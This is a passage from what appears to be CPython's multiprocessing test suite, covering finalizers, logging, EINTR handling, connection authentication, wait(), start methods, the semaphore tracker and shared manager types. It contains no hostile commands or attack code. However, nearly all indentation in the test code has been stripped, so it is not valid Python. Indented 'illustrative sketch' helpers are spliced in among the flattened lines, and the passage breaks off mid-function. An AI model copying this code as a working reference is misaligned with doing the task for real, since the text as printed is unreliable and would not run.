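# Illustrative sketch (not part of the test suite): util.Finalize attaches a
# callback to an object that fires when the object is collected or when the
# finalizer is invoked directly, which is the machinery _test_finalize()
# below drives through a child process. Names here are illustrative only.
def _example_finalize():
    from multiprocessing import util
    events = []
    class _Owner(object):
        pass
    owner = _Owner()
    util.Finalize(owner, events.append, args=('collected',))
    del owner        # on CPython the refcount drop runs the callback right away
    return events    # ['collected']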
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
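# Illustrative sketch (not part of the test suite): multiprocessing keeps a
# single module-level logger; log_to_stderr() attaches a stream handler so
# its records become visible, complementing the level checks below.
def _example_enable_mp_logging():
    import logging
    import multiprocessing
    logger = multiprocessing.log_to_stderr()   # same logger object as get_logger()
    logger.setLevel(logging.INFO)
    logger.info('multiprocessing logging enabled')
    return logger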
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
pid = _semaphore_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("semaphore_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGTERM, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
